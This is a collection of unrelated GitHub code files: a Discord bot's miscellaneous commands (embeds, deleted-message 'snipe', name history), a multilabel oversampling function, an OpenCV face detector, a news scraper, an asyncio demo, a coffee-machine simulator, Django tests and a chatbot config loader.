lookup is None else lookup\n # tags = await self.rival.tags(discriminator=lookup)\n # if tags is None:\n # await ctx.success(f'> No recent **{lookup}** tags')\n # embeds = []\n # ret = []\n # num = 0\n # pagenum = 0\n # for t in tags:\n # t=t.replace(\"**\",\"\")\n # num += 1\n # ret.append(f'**{num}.** {t}')\n # pages = [p for p in discord.utils.as_chunks(ret, 10)]\n # for page in pages:\n # pagenum += 1\n # embeds.append(discord.Embed(\n # color=color,\n # title=f'Recently available {lookup} tags',\n # description=\"\\n\".join(page))\n # .set_author(name=ctx.author.display_name, icon_url=ctx.author.display_avatar)\n # .set_footer(text=f'Page {pagenum}/{len(pages)}')\n # )\n # if len(embeds) == 1:\n # return await ctx.send(embed=embeds[0])\n # else:\n # pag = Paginator(self.bot, embeds, ctx, invoker=ctx.author.id)\n # pag.add_button('prev', emoji='<:void_previous:1082283002207424572>')\n # pag.add_button('goto', emoji='<:void_goto:1082282999187517490>')\n # pag.add_button('next', emoji='<:void_next:1082283004321341511>')\n # pag.add_button('delete', emoji='<:void_cross:1082283006649188435>')\n # await pag.start()\n\n @commands.command(\n name='createembed',\n description='Create a custom embed',\n brief='code',\n usage=\n 'Syntax: (embed code)\\n'\n 'Example: {title: void}$v{description: into the void}',\n aliases=['customembed', 'ce']\n )\n async def createembed(self, ctx, *, embed = None):\n await ctx.typing()\n\n if not embed: return await ctx.send_help(ctx.command)\n result = await to_object(embed)\n embed = result['embed']\n if embed:\n if embed.title:\n embed.title = await embed_replacement(ctx.author, embed.title)\n if embed.description:\n embed.description = await embed_replacement(ctx.author, embed.description)\n if embed.footer:\n if embed.footer.text and embed.footer.icon_url:\n embed.set_footer(text=await embed_replacement(ctx.author, embed.footer.text), icon_url=await embed_replacement(ctx.author, embed.footer.icon_url))\n elif embed.footer.text:\n embed.set_footer(text=await embed_replacement(ctx.author, embed.footer.text))\n elif embed.footer.icon_url:\n embed.set_footer(icon_url=await embed_replacement(ctx.author, embed.footer.icon_url))\n if embed.author:\n if embed.author.name and embed.author.icon_url:\n embed.set_author(name=await embed_replacement(ctx.author, embed.author.name), icon_url=await embed_replacement(ctx.author, embed.author.icon_url))\n elif embed.author.name:\n embed.set_author(name=await embed_replacement(ctx.author, embed.author.name))\n elif embed.author.icon_url:\n embed.set_author(icon_url=await embed_replacement(ctx.author, embed.author.icon_url))\n if embed.fields:\n for field in embed.fields:\n if field.name:\n embed.set_field_at(index=embed.fields.index(field), name=await embed_replacement(ctx.author, field.name), value=await embed_replacement(ctx.author, field.value), inline=field.inline)\n if embed.image:\n embed.set_image(url=await embed_replacement(ctx.author, embed.image.url))\n if embed.thumbnail:\n embed.set_thumbnail(url=await embed_replacement(ctx.author, embed.thumbnail.url))\n content = result['content']\n if content:\n content = await embed_replacement(ctx.author, content)\n msg = await ctx.send(content=content, embed=embed, view=result['view'], files=result['files'], delete_after=result['delete_after'], allowed_mentions=discord.AllowedMentions(users=True, everyone=False))\n\n @commands.command(\n name='snipe',\n description='View deleted messages',\n brief='index',\n usage=\n 'Syntax: <index>\\n'\n 'Example: 2',\n aliases=['sn', 's']\n )\n async def snipe(self, ctx, page: int = 1):\n from datetime import datetime\n await ctx.typing()\n\n messages_per_page = 1 # Change this number to adjust the number of messages per page\n offset = (page - 1) * messages_per_page\n count = await self.bot.db.fetchval(\"SELECT COUNT(*) FROM snipe WHERE channel_id = $1\", ctx.channel.id)\n total_pages = (count + messages_per_page - 1) // messages_per_page\n data = await self.bot.db.fetch(\n \"SELECT * FROM snipe WHERE channel_id = $1 ORDER BY id DESC LIMIT $2 OFFSET $3\",\n ctx.channel.id, messages_per_page, offset\n )\n if not data:\n return await ctx.success(\"No deleted messages found\")\n if data:\n author = await self.bot.fetch_user(data[0][3])\n content = data[0][4]\n e = discord.Embed(\n timestamp=datetime.utcnow(),\n color=color,\n description=content\n )\n e.set_author(name=f'{author.name}', icon_url=author.display_avatar)\n e.set_footer(text=f\"Page {page}/{total_pages}\")\n if data[0][5]: # If there is an attachment in the message\n if data[0][6] in [\"image\", \"video\", \"gif\"]: # If the attachment is an image, video, or gif\n e.set_image(url=data[0][5])\n elif data[0][6] == \"audio\": # If the attachment is audio\n e.add_field(name=\"Attachment\", value=f\"[{data[0][5]}]({data[0][5]})\")\n else: # If the attachment is another type\n e.add_field(name=\"Attachment\", value=data[0][5])\n await ctx.send(embed=e)\n\n @commands.command(\n name='editsnipe',\n description='View edited messages',\n brief='index',\n usage=\n 'Syntax: <index>\\n'\n 'Example: 2',\n aliases=['esnipe', 'es', 'eh']\n )\n async def editsnipe(self, ctx, page: int = 1):\n from datetime import datetime\n await ctx.typing()\n\n messages_per_page = 1 # Change this number to adjust the number of messages per page\n offset = (page - 1) * messages_per_page\n count = await self.bot.db.fetchval(\"SELECT COUNT(*) FROM editsnipe WHERE channel_id = $1\", ctx.channel.id)\n total_pages = (count + messages_per_page - 1) // messages_per_page\n data = await self.bot.db.fetch(\n \"SELECT * FROM editsnipe WHERE channel_id = $1 ORDER BY id DESC LIMIT $2 OFFSET $3\",\n ctx.channel.id, messages_per_page, offset\n )\n if not data:\n return await ctx.success(\"No edited messages found\")\n author = await self.bot.fetch_user(data[0][3])\n content = data[0][4]\n e = discord.Embed(\n timestamp=datetime.utcnow(),\n color=color,\n description=content\n )\n e.set_author(name=f'{author.name}', icon_url=author.display_avatar)\n e.set_footer(text=f\"Page {page}/{total_pages}\")\n if data[0][5]: # If there is an attachment in the message\n if data[0][6] in [\"image\", \"video\", \"gif\"]: # If the attachment is an image, video, or gif\n e.set_image(url=data[0][5])\n elif data[0][6] == \"audio\": # If the attachment is audio\n e.add_field(name=\"Attachment\", value=f\"[{data[0][5]}]({data[0][5]})\")\n else: # If the attachment is another type\n e.add_field(name=\"Attachment\", value=data[0][5])\n await ctx.send(embed=e)\n\n @commands.command(\n name='reactionsnipe',\n description='View removed reactions',\n brief='message, index',\n usage=\n 'Syntax: (message) <index>\\n'\n 'Example: 1080672479426646136 2',\n aliases=['rsnipe', 'rs', 'rh']\n )\n async def reactionsnipe(self, ctx, message_id: int, page: int = 1):\n from datetime import datetime\n await ctx.typing()\n\n messages_per_page = 1\n offset = (page - 1) * messages_per_page\n count = await self.bot.db.fetchval(\"SELECT COUNT(*) FROM reactionsnipe WHERE message_id = $1\", message_id)\n total_pages = (count + messages_per_page - 1) // messages_per_page\n data = await self.bot.db.fetch(\n \"SELECT * FROM reactionsnipe WHERE message_id = $1 ORDER BY id DESC LIMIT $2 OFFSET $3\",\n message_id, messages_per_page, offset\n )\n if not data:\n return await ctx.success(\"No removed reactions found\")\n removed_reactions_str = \"\"\n author = await self.bot.fetch_user(data[0][4])\n reaction = data[0][5]\n channel_id = data[0][2]\n channel = self.bot.get_channel(channel_id)\n if reaction.startswith(\"<\") and reaction.endswith(\">\"): # Custom emote\n emoji_id = int(reaction.split(\":\")[2][:-1])\n emoji = await ctx.guild.fetch_emoji(emoji_id)\n else:\n emoji = reaction\n message_url = f\"https://discord.com/channels/{ctx.guild.id}/{channel.id}/{message_id}\"\n removed_reactions_str += f\"[{emoji}]({message_url})\\n\"\n e = discord.Embed(\n description=removed_reactions_str,\n color=color,\n timestamp=datetime.utcnow()\n )\n e.set_author(name=f'{author.name}', icon_url=author.display_avatar)\n e.set_footer(text=f\"Page {page}/{total_pages}\")\n await ctx.send(embed=e)\n\n @commands.command(\n name='clearsnipes',\n description='Clear deleted channel messages from the database',\n usage='Syntax: ',\n aliases=['clearsnipe', 'cs']\n )\n @commands.has_permissions(manage_messages=True)\n async def clearsnipes(self, ctx):\n await self.bot.db.execute('DELETE FROM snipe WHERE guild_id = $1', ctx.guild.id)\n await self.bot.db.execute('DELETE FROM editsnipe WHERE guild_id = $1', ctx.guild.id)\n await self.bot.db.execute('DELETE FROM reactionsnipe WHERE guild_id = $1', ctx.guild.id)\n await ctx.message.add_reaction('👍🏾')\n\n @commands.command(\n name='names',\n description='Display a members name history',\n brief='user',\n usage=\n 'Syntax: <user>\\n'\n 'Example: @court#9000'\n )\n async def names(self, ctx, member: Union[discord.Member, discord.User] = None):\n member = ctx.author if member is None else member\n await ctx.typing()\n\n data = await self.bot.db.fetch('SELECT username, discriminator, timestamp FROM names WHERE user_id = $1 ORDER BY timestamp DESC', member.id)\n if not data:\n await ctx.success(f\"No previously recorded names for {member.mention}\")\n embeds = []\n ret = []\n num = 0\n pagenum = 0\n for row in data:\n num += 1\n ret.append(f'**{num}.** {row[\"username\"]}#{row[\"discriminator\"]} - {discord.utils.format_dt(row[\"timestamp\"], style=\"R\")}')\n pages = [p for p in discord.utils.as_chunks(ret, 10)]\n for page in pages:\n pagenum += 1\n embeds.append(discord.Embed(\n title=f\"{member.name}'s previous names\",\n color=color, \n description=\"\\n\".join(page))\n .set_author(name=ctx.author.display_name, icon_url=ctx.author.display_avatar)\n .set_footer(text=f\"Page {pagenum}/{len(pages)}\")\n )\n if len(embeds) == 1:\n return await ctx.send(embed=embeds[0])\n else:\n pag = Paginator(self.bot, embeds, ctx, invoker=ctx.author.id)\n pag.add_button(\"prev\", emoji=\"<:void_previous:1082283002207424572>\")\n pag.add_button(\"goto\", emoji=\"<:void_goto:1082282999187517490>\")\n pag.add_button(\"next\", emoji=\"<:void_next:1082283004321341511>\")\n pag.add_button(\"delete\", emoji=\"<:void_cross:1082283006649188435>\")\n await pag.start()\n\n @commands.command(\n name='clearnames',\n description='Clear your name history',\n usage='Syntax: ',\n aliases=['cn']\n )\n async def clearnames(self, ctx):\n await ctx.typing()\n data = await self.bot.db.fetch('SELECT * FROM names WHERE user_id = $1', ctx.author.id)\n if data:\n await self.bot.db.execute('DELETE FROM names WHERE user_id = $1', ctx.author.id)\n await ctx.success('Cleared your name history')\n if not data:\n await ctx.success(f\"No previously recorded names for {ctx.author.mention}\")\n\nasync def setup(bot):\n await bot.add_cog(Miscellaneous(bot))","repo_name":"hifthot/skidcity","sub_path":"void/cogs/Miscellaneous.py","file_name":"Miscellaneous.py","file_ext":"py","file_size_in_byte":16584,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"10411683944","text":"\n# coding: utf-8\n\n# In[ ]:\n\n\nfrom sklearn.datasets import make_multilabel_classification\n\nimport torch\nimport os\nimport pandas as pd\nimport numpy as np\nfrom collections import defaultdict\nimport random\n\n\n# In[ ]:\n\n\ndef IRLbl(y):\n LABELS = defaultdict(int)\n for sample in y:\n for label in sample:\n LABELS[label] += 1\n \n max_count = max(LABELS.values())\n for key,value in LABELS.items():\n print(f'{key} {LABELS[key]}')\n LABELS[key] = max_count/LABELS[key]\n \n \n return LABELS\n\n\n\ndef MeanIR(y,ratios=False):\n imb_ratios = IRLbl(y)\n # print(f'\\n ke {imb_ratios} \\n\\n\\n\\n')\n if ratios:\n return (sum(imb_ratios.values())/len(imb_ratios), imb_ratios)\n else:\n return (sum(imb_ratios.values())/len(imb_ratios))\n \n\n\n\ndef Label_Bags(X,y):\n \" Constructs Bags of samples for every label in the dataset. A label's Bag contains samples whose label set contains the label.\"\n assert(len(X) == len(y))\n Bags = defaultdict(list)\n for id, labels in enumerate(y):\n for label in labels:\n Bags[label].append([X[id],y[id]])\n return Bags\n\n\n\ndef ML_ROS(dataset, p):\n \n (X,y) = dataset\n X = list(X)\n y = list(y)\n\n samples_to_clone = len(X)*p/(100)\n mean_ir, imb_ratios = MeanIR(y=y, ratios=True)\n label_bags = Label_Bags(X,y)\n \n minBag = {}\n for label in label_bags.keys():\n if imb_ratios[label] > mean_ir:\n minBag[label] = label_bags[label]\n \n while samples_to_clone>0:\n if(minBag):\n for label in list(minBag):\n minBag_i = minBag[label]\n sample = random.sample(minBag_i,1)[0]\n\n minBag_i.append(sample)\n X.append(sample[0])\n y.append(sample[1])\n\n mean_ir, imb_ratios = MeanIR(y=y,ratios=True)\n if imb_ratios[label] <= mean_ir:\n minBag.pop(label)\n print(f'label {label} popped')\n samples_to_clone-=1\n print(f'{len(X)}, {samples_to_clone} mean_ir {mean_ir}')\n else:\n minBag = {}\n for label in label_bags.keys():\n if imb_ratios[label] > mean_ir:\n minBag[label] = label_bags[label]\n \n if(minBag is None):\n break\n return X,y\n \n\n","repo_name":"SaiTeja390/Oversampling","sub_path":"ML_ROS.py","file_name":"ML_ROS.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21703930124","text":"import sys\nimport argparse\nimport os\nimport numpy as np\nimport cv2\n\nparser = argparse.ArgumentParser(prog=sys.argv[0], description='detect object with webcam & opencv', allow_abbrev=False)\nparser.add_argument('--width',type=int, dest='width', required=True)\nparser.add_argument('--height',type=int, dest='height', required=True)\nparser.add_argument('--FPS',type=int, dest='FPS', required=True)\nparser.add_argument('--limit-buffer',dest='limitBuffer', action='store_true')\nargs = parser.parse_args()\n\nwidth=args.width\nheight=args.height\nFPS=args.FPS\nlimitBuffer=args.limitBuffer\n\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc(*'MJPG'))\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, width)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)\ncap.set(cv2.CAP_PROP_FPS, FPS)\nif limitBuffer:\n cap.set(cv2.CAP_PROP_BUFFERSIZE,1)\n\n\n\nxml_path = '/home/devchu/.virtualenvs/cv/lib/python3.7/site-packages/cv2/data/'\nface_cascade = cv2.CascadeClassifier(xml_path + 'haarcascade_frontalface_default.xml')\n\n\n# only attempt to read if it is opened\nif cap.isOpened:\n while(True):\n ret, frame = cap.read()\n\n if True:\n #cv2.imshow('frame',frame)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n #cv2.imshow('gray',gray)\n faces = face_cascade.detectMultiScale(gray, scaleFactor=1.3, minNeighbors=5)\n #for each face...\n for (x, y, w, h) in faces:\n # draw a rectangle around the face\n #gray = cv2.rectangle(gray, (x, y), (x+w, y+h), (255, 255, 255), 3)\n frame = cv2.rectangle(frame, (x, y), (x+w, y+h), (255, 255, 255), 3)\n\n #cv2.imshow('gray', gray)\n cv2.imshow('frame', frame)\n else:\n print(\"Error reading capture device\")\n break\n if cv2.waitKey(1) & 0xff == ord('q'):\n break\n\n cap.release()\n cv2.destroyAllWindows()\nelse:\n print(\"Failed to open capture device\")\n\n","repo_name":"elicorrales/eliraspberry4","sub_path":"Python/OpenCV/Fort.Laud.Robotics.Group.Meetups/loopFaceDetect.py","file_name":"loopFaceDetect.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14878907769","text":"import sys\nimport json\nfrom newspaper import Article\nfrom newspaper import Config\nurl = sys.argv[1]\n\nuser_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'\nconfig = Config()\nconfig.browser_user_agent = user_agent\n\narticle = Article(url, config=config)\n\narticle.download()\narticle.parse()\ntext = ' '.join(article.text.split(' ')[:1000])\n\nexport = {\n \"title\": article.title,\n \"text\": text\n}\n\napp_json = json.dumps(export)\nprint(app_json)\n\n\n\n\n# from requests import get\n# response = get(url)\n\n# extractor = Goose()\n# article = extractor.extract(raw_html=response.content)\n","repo_name":"2011-sagittarius/FakeNews","sub_path":"python/Scrape.py","file_name":"Scrape.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1739234328","text":"import asyncio\nimport time\nimport requests\n\nasync def function1(): #Download file\n url = 'https://www.facebook.com/favicon.ico'\n r = requests.get(url, allow_redirects=True)\n open('facebook.ico', 'wb').write(r.content)\n\n await asyncio.sleep(1)\n print(\"Function1\")\n return \"Abhay\"\n\nasync def function2():\n await asyncio.sleep(1)\n print(\"Function2\")\n\nasync def function3():\n await asyncio.sleep(4)\n print(\"Function3\")\n\nasync def main():\n \"\"\" task = asyncio.create_task(function1())\n #await function1()\n await function2()\n await function3() \"\"\"\n\n l = await asyncio.gather(\n function1(),\n function2(),\n function3(),\n )\n print(type(l),l)\n\nasyncio.run(main())","repo_name":"abhay2767/Python-Code","sub_path":"86_Async_Await.py","file_name":"86_Async_Await.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41272865061","text":"# myCoffeeMaker έκδοση 4, με χρήση κλάσεων και επέκταση των προδιαγραφών\n# περιλαμβάνει: διαχείριση των μετρητών, στατιστικά πωλήσεων \n# υλοποίηση undo σε οποιαδήποτε φάση της πληρωμής\n\nimport datetime\nimport os\n\ndir = os.path.dirname(__file__)\n\nclass Drink():\n panel = {}\n @staticmethod\n def printStats():\n print(10*'=', ' STATS ', 10*'=')\n for id,drink in Drink.panel.items():\n stats = \", \".join([':'.join([x, str(drink.stats[x])]) for x in drink.stats])\n print(f\"{drink.description}: {stats}\")\n print(30*'=')\n\n def __init__(self, id, description, price):\n self.id = str(id)\n self.description = description\n self.price = int(price)\n self.stats = {}\n Drink.panel[self.id] = self\n\n def buy(self):\n # διαχείριση διαλόγου με τον χρήστη για πληρωμή του ροφήματος\n # υλοποιεί τη δυνατότητα ακύρωσης παραγγελίας ενώ γίνεται η πληρωμή\n\n def message(myrest):\n print('επιστροφή:')\n for r in sorted(myrest):\n print(f\"{myrest[r]} x {r/100:.2f}€\")\n\n whatHappened = None\n self.paid = []\n toPay = self.price\n print(f'Πρέπει να πληρώσετε {self.price/100:.2f}€')\n print('Δεκτά νομίσματα: ', end=\"\")\n for coin, obj in Coin.cashier.items():\n print(f\"{obj.description}, \", end=\"\")\n print()\n while True: # διαδικασία πληρωμής\n try:\n print(f'οφείλετε ακόμη {(self.price-sum(self.paid))/100:.2f}€')\n # print(f'οφείλετε ακόμη {toPay/100:.2f}€')\n # υλοποίηση ακύρωσης πληρωμής σε οποιαδήποτε ενδιάμεση φάση\n reply = input(f'Πληρωμή({\",\".join([f\"{x/100:.2f}\" for x in Coin.cashier.keys()])}) ή x (cancel):')\n if reply.lower() == 'x':\n # to return coins self.price - toPay\n whatHappened = (False, dict([(x, self.paid.count(x)) for x in self.paid]))\n message(whatHappened[1])\n toPay = 0\n break\n else:\n paid = float(reply)\n if paid in [x/100 for x in Coin.cashier.keys()]:\n paid = int(paid*100)\n self.paid.append(paid)\n else: continue\n except: continue\n toPay -= paid\n if toPay <= 0: break # έχει πληρωθεί το ποσόν\n if toPay < 0:\n whatHappened = Coin.giveRest(self.price, self.paid)\n message(whatHappened[1])\n if whatHappened and whatHappened[0]: \n print('Απολαύστε το ρόφημά σας....')\n today = datetime.datetime.now().strftime('%d-%m-%Y')\n self.stats[today] = self.stats.get(today, 0) + 1\n # ενημέρωση ταμείου \n toUpdateCashier = {}\n for item in self.paid:\n toUpdateCashier[item] = toUpdateCashier.get(item,0) + 1\n for item in whatHappened[1]:\n toUpdateCashier[item] = toUpdateCashier.get(item,0) - whatHappened[1][item]\n print(toUpdateCashier)\n for coin in toUpdateCashier:\n Coin.cashier[coin].ammount += toUpdateCashier[coin]\n\nclass Coin():\n cashier = {}\n @staticmethod\n def printCashier():\n print(10*'=', 'CASHIER', 10*'=')\n total = 0\n for val,coin in Coin.cashier.items():\n print(f\"{coin.description}: {coin.ammount}\")\n total += val * coin.ammount\n print(f'TOTAL {total/100:5.2f}€')\n print(30*'=')\n\n @staticmethod\n def giveRest(drinkPrice, paid):\n '''μέθοδος που για ορισμένο ποσό που πρέπει να πληρωθεί (drinkPrice), ελέγχει αν έχει\n ρέστα να δώσει, αν ναι, παραλαμβάνει τα νομισματα της λίστας paid, και επιστρέφει τα ρέστα\n αν όχι, επιστρέφει τα νομίσματα της paid και στέλνει αντίστοιχο μήνυμα, ότι δεν προχωράει\n η αγορά επιστρέφει (True/False, restCoins)'''\n \n toReturn = sum(paid) - drinkPrice # το ποσό που πρέπει να επιστραφεί\n if toReturn < 0:\n return (False, {}) # αγορά δεν έγινε, η δοσοληψία είναι σε εξέλιξη (όχι αρκετά χρήματα)\n if toReturn == 0:\n return (True, {})\n # προσωρινή κατάσταση ταμείου αν προστεθούν και τα χρήματα που μόλις πήραμε\n tempCashier = {}\n for coin in Coin.cashier:\n tempCashier[coin] = Coin.cashier[coin].ammount\n for coin in paid:\n tempCashier[coin] += 1\n \n # έλεγχος αν μπορούμε να δώσουμε ρέστα\n restCoins = {}\n for coin in sorted(tempCashier.keys(), reverse=True ):\n quantity = toReturn//coin\n if quantity :\n if tempCashier[coin] >= quantity:\n restCoins[coin] = quantity\n else:\n restCoins[coin] = tempCashier[coin]\n toReturn -= coin * restCoins[coin]\n if not toReturn: # βρέθηκαν ρέστα\n return (True, restCoins)\n else: # δεν βρέθηκαν ρέστα\n print('undo.... δεν υπάρχουν ρέστα, πληρώστε ακριβές ποσό.')\n restCoins = {}\n for coin in paid:\n restCoins[coin] = restCoins.get(coin, 0) + 1\n return (False, restCoins)\n\n def __init__(self, description, value, ammount):\n self.description = description\n self.value = int(value)\n self.ammount = int(ammount)\n Coin.cashier[self.value] = self\n\nclass Controller():\n def __init__(self):\n self.loadDrinks(os.path.join(dir,'drinks.txt'))\n self.loadCoins(os.path.join(dir,'coins.txt'))\n\n def loadDrinks(self, filename):\n for drink in open(filename, 'r', encoding='utf8'):\n drink = drink.strip().split(';')\n Drink(*drink)\n\n def loadCoins(self, filename):\n for coin in open(filename, 'r', encoding='utf8'):\n coin = coin.strip().split(';')\n Coin(*coin)\n \n def run(self):\n # κύριος βρόχος - μενού\n while True:\n Coin.printCashier() # coins left\n Drink.printStats() # στατιστικά πωλήσεων TODO: να αποθηκεύονται σε αρχείο\n print('Επιλέξτε ρόφημα:')\n for id,d in Drink.panel.items():\n print(f\"{d.id}: {d.description} - Τιμή: {d.price/100:2.2f}€\")\n print(\"0: Έξοδος\")\n selection = input('Επιλογή:')\n if selection == \"0\": break\n if selection in Drink.panel.keys():\n selected = Drink.panel[selection]\n selected.buy()\n\n# main program\nif __name__ == \"__main__\": # τρέξε το πρόγραμμα από CLI\n loader = Controller()\n loader.run()","repo_name":"navouris/myCoffee","sub_path":"coffee_v4/myCoffee4.py","file_name":"myCoffee4.py","file_ext":"py","file_size_in_byte":7720,"program_lang":"python","lang":"el","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"41156363666","text":"# coding: utf-8 _*_\nfrom django.test import TestCase\nfrom apps.ventas.models.Producto import Producto\nfrom apps.ventas.models.Departamento import Departamento\nfrom apps.ventas.models.Categoria import Categoria\nfrom apps.ventas.models.UnidadMedida import UnidadMedidaC\nfrom apps.ventas.models.UnidadMedida import UnidadMedidaV\nfrom apps.ventas.models.Venta import Venta\nfrom apps.ventas.models.Venta_Detalle import Detalle_Venta\nfrom apps.clivet.models.cliente import Cliente\nfrom backengo.sad.models import User\nfrom apps.params.models import Person\n\n# Create your tests here.\n\n\nclass ProductoTestCase(TestCase):\n\n def setUp(self):\n\n a1 = Departamento.objects.create(descripcion=\"departamentoprueba\")\n a2 = Categoria.objects.create(\n descripcion=\"Categoriatest\", departamento=a1)\n a3 = UnidadMedidaV.objects.create(\n nombre=\"kilogramosprueba\", simbolo=\"kg\")\n a4 = UnidadMedidaC.objects.create(\n nombre=\"arobas\", simbolo=\"@\", cant_equivalencia=12, unidad_medida_venta=a3)\n Producto.objects.create(\n nombre=\"productoTests00000001\", codigo=\"0001test\", categoria=a2, fechaVencimiento='2026-12-12', unidad_medida=a4, precioV=2.20, precioC=2.00, existencia=0.00, MontoReal=0.00, igv=0.00)\n Producto.objects.create(\n nombre=\"productoTests00000002\", codigo=\"0002test\", categoria=a2, fechaVencimiento='2016-12-12', unidad_medida=a4, precioV=2.20, precioC=2.00, existencia=0.00, MontoReal=0.00, igv=0.00)\n\n def test_animals_can_speak(self):\n \"\"\"Animals that can speak are correctly identified\"\"\"\n productoTests00000001 = Producto.objects.get(\n nombre=\"productoTests00000001\")\n productoTests00000002 = Producto.objects.get(\n nombre=\"productoTests00000002\")\n self.assertEqual(productoTests00000001.codigo, '0001test')\n self.assertEqual(productoTests00000002.codigo, '0002test')\n\n\nclass VentaTestCase(TestCase):\n\n def setUp(self):\n\n persona = Person.objects.create(first_name=\"German\")\n cliente = Cliente.objects.create(persona=persona)\n usuario = User.objects.create(username=\"germancastrovilchez\")\n departamento = Departamento.objects.create(\n descripcion=\"departamentoprueba\")\n categoria = Categoria.objects.create(\n descripcion=\"Categoriatest\",\n departamento=departamento)\n unidadV = UnidadMedidaV.objects.create(\n nombre=\"kilogramosprueba\", simbolo=\"kg\")\n unidadC = UnidadMedidaC.objects.create(\n nombre=\"arobas\",\n simbolo=\"@\",\n cant_equivalencia=12,\n unidad_medida_venta=unidadV)\n p1 = Producto.objects.create(\n nombre=\"productoTests00000001\",\n codigo=\"0001test\",\n categoria=categoria,\n fechaVencimiento='2026-12-12',\n unidad_medida=unidadC,\n precioV=2.00,\n precioC=2.00,\n existencia=0.00,\n MontoReal=0.00,\n igv=0.00)\n p2 = Producto.objects.create(\n nombre=\"productoTests00000002\",\n codigo=\"0002test\",\n categoria=categoria,\n fechaVencimiento='2016-12-12',\n unidad_medida=unidadC,\n precioV=2.00, precioC=2.00,\n existencia=0.00,\n MontoReal=0.00,\n igv=0.00)\n p3 = Producto.objects.create(\n nombre=\"productoTests00000003\",\n codigo=\"0003test\",\n categoria=categoria,\n fechaVencimiento='2016-12-12',\n unidad_medida=unidadC,\n precioV=2.00, precioC=2.00,\n existencia=0.00,\n MontoReal=0.00,\n igv=0.00)\n p4 = Producto.objects.create(\n nombre=\"productoTests00000004\",\n codigo=\"0004test\",\n categoria=categoria,\n fechaVencimiento='2016-12-12',\n unidad_medida=unidadC,\n precioV=2.00, precioC=2.00,\n existencia=0.00,\n MontoReal=0.00,\n igv=0.00)\n p5 = Producto.objects.create(\n nombre=\"productoTests00000005\",\n codigo=\"0005test\",\n categoria=categoria,\n fechaVencimiento='2016-12-12',\n unidad_medida=unidadC,\n precioV=2.00,\n precioC=2.00,\n existencia=0.00,\n MontoReal=0.00,\n igv=0.00)\n p6 = Producto.objects.create(\n nombre=\"productoTests00000006\",\n codigo=\"0006test\",\n categoria=categoria,\n fechaVencimiento='2016-12-12',\n unidad_medida=unidadC,\n precioV=2.00,\n precioC=2.00,\n existencia=0.00,\n MontoReal=0.00,\n igv=0.00)\n venta = Venta.objects.create(\n fechav='2016-12-12',\n total=18,\n cliente=cliente,\n user=usuario,\n igv=3.24)\n Detalle_Venta.objects.create(\n producto=p1,\n venta=venta,\n importe=4.00,\n cantidad=2.00)\n Detalle_Venta.objects.create(\n producto=p2,\n venta=venta,\n importe=4.00,\n cantidad=2.00)\n Detalle_Venta.objects.create(\n producto=p3,\n venta=venta,\n importe=4.00,\n cantidad=2.00)\n Detalle_Venta.objects.create(\n producto=p4,\n venta=venta,\n importe=4.00,\n cantidad=2.00)\n Detalle_Venta.objects.create(\n producto=p5,\n venta=venta,\n importe=4.00,\n cantidad=2.00)\n Detalle_Venta.objects.create(\n producto=p6,\n venta=venta,\n importe=4.00,\n cantidad=2.00)\n\n def test_animals_can_speak(self):\n \"\"\"Animals that can speak are correctly identified\"\"\"\n productoTests00000001 = Producto.objects.get(\n nombre=\"productoTests00000001\")\n productoTests00000002 = Producto.objects.get(\n nombre=\"productoTests00000002\")\n productoTests00000003 = Producto.objects.get(\n nombre=\"productoTests00000003\")\n productoTests00000004 = Producto.objects.get(\n nombre=\"productoTests00000004\")\n productoTests00000005 = Producto.objects.get(\n nombre=\"productoTests00000005\")\n productoTests00000006 = Producto.objects.get(\n nombre=\"productoTests00000006\")\n CantidadP = Detalle_Venta.objects.filter(venta=1)\n self.assertEqual(CantidadP.count(), 6)\n self.assertEqual(productoTests00000001.nombre, 'productoTests00000001')\n self.assertEqual(productoTests00000002.nombre, 'productoTests00000002')\n self.assertEqual(productoTests00000003.nombre, 'productoTests00000003')\n self.assertEqual(productoTests00000004.nombre, 'productoTests00000004')\n self.assertEqual(productoTests00000005.nombre, 'productoTests00000005')\n self.assertEqual(productoTests00000006.nombre, 'productoTests00000006')\n","repo_name":"AngieChambi/CopaisegSIS","sub_path":"apps/ventas/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":7064,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37049373981","text":"# encoding:utf-8\n\nimport json\nimport os\nfrom common.log import logger\n\nconfig = {\n \"open_ai_api_key\": \"YOUR API KEY\",\n \"model\": \"gpt-3.5-turbo\",\n \"proxy\": \"\",\n \"single_chat_prefix\": [\"bot\", \"@bot\"],\n \"single_chat_reply_prefix\": \"\",\n \"group_chat_prefix\": [\"@bot\"],\n \"group_name_white_list\": [\"ChatGPT测试群\", \"ChatGPT测试群2\"],\n \"image_create_prefix\": [\"画\", \"发\", \"找\"],\n \"speech_recognition\": False,\n \"voice_reply_voice\": False,\n \"conversation_max_tokens\": 1000,\n \"expires_in_seconds\": 36000,\n \"character_desc\": \"你是ChatGPT, 一个由OpenAI训练的大型语言模型, 你旨在回答并解决人们的任何问题,并且可以使用多种语言与人交流。\"\n}\n\n\ndef load_config():\n global config\n config.update(\n {\n \"open_ai_api_key\": os.getenv(\"open_ai_api_key\", \"YOUR API KEY\"),\n \"model\": os.getenv(\"model\", \"gpt-3.5-turbo\"),\n \"single_chat_prefix\": os.getenv(\"single_chat_prefix\", \"bot @bot\").split(),\n \"group_chat_prefix\": os.getenv(\"group_chat_prefix\", \"bot @bot\").split(),\n \"group_name_white_list\": 